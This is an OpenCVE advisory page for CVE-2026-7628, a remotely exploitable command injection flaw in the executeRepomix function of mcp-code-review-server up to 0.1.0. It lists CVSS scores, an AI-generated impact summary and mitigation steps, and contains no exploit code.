Description
A vulnerability was detected in crazyrabbitLTC mcp-code-review-server up to 0.1.0. This issue affects the function executeRepomix of the file src/repomix.ts of the component RepoMix Command Handler. Performing a manipulation results in command injection. The attack may be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through a pull request but has not reacted yet.
Published: 2026-05-02
Score: 5.3 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability is a command injection flaw within the executeRepomix function of the RepoMix Command Handler in mcp-code-review-server. Exploitation allows an attacker to supply crafted input that is executed by the host operating system as arbitrary shell commands, potentially compromising confidentiality, integrity, and availability of the affected system. The flaw is formally classified as CWE-74 (Command Injection) and CWE-77 (Improper Validation of Command Contributing Data).

Affected Systems

The issue affects the open‑source project crazyrabbitLTC:mcp-code-review-server, with all releases up to and including version 0.1.0 being vulnerable. No later updates are documented in the provided data, and the project has not yet released a fix.

Risk and Exploitability

The CVSS score of 5.3 indicates a moderate severity baseline. The EPSS score is not available, and the vulnerability is not listed in CISA’s KEV catalog, suggesting no confirmed mass exploitation yet. The likely attack vector is remote, requiring network access to the service that hosts the executeRepomix endpoint. Because the vulnerability permits unconstrained command execution, the potential impact is high if an attacker can reach the affected instance. The lack of an official patch or workaround increases the risk, making mitigation a priority.

Generated by OpenCVE AI on May 2, 2026 at 13:20 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply any vendor‑supplied patch or upgrade to a later release when available.
  • If a patch is unavailable, temporarily disable or remove the RepoMix executeRepomix feature to block the injection surface.
  • Restrict network exposure of the mcp-code-review-server service to trusted hosts and enforce strict firewall rules.
  • Run the service under the least privileged account possible and isolate it from the host OS.

Generated by OpenCVE AI on May 2, 2026 at 13:20 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Sat, 02 May 2026 12:15:00 +0000

Type Values Removed Values Added
Description A vulnerability was detected in crazyrabbitLTC mcp-code-review-server up to 0.1.0. This issue affects the function executeRepomix of the file src/repomix.ts of the component RepoMix Command Handler. Performing a manipulation results in command injection. The attack may be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through a pull request but has not reacted yet.
Title crazyrabbitLTC mcp-code-review-server RepoMix repomix.ts executeRepomix command injection
Weaknesses CWE-74
CWE-77
References
Metrics cvssV2_0

{'score': 6.5, 'vector': 'AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR'}

cvssV3_0

{'score': 6.3, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R'}

cvssV3_1

{'score': 6.3, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R'}

cvssV4_0

{'score': 5.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P'}

Subscriptions

No data.

cve-icon MITRE

Status: PUBLISHED

Assigner: VulDB

Published:

Updated: 2026-05-02T12:00:14.660Z

Reserved: 2026-05-01T14:22:12.238Z

Link: CVE-2026-7628

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Received

Published: 2026-05-02T12:16:17.163

Modified: 2026-05-02T12:16:17.163

Link: CVE-2026-7628

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-02T13:30:43Z

Weaknesses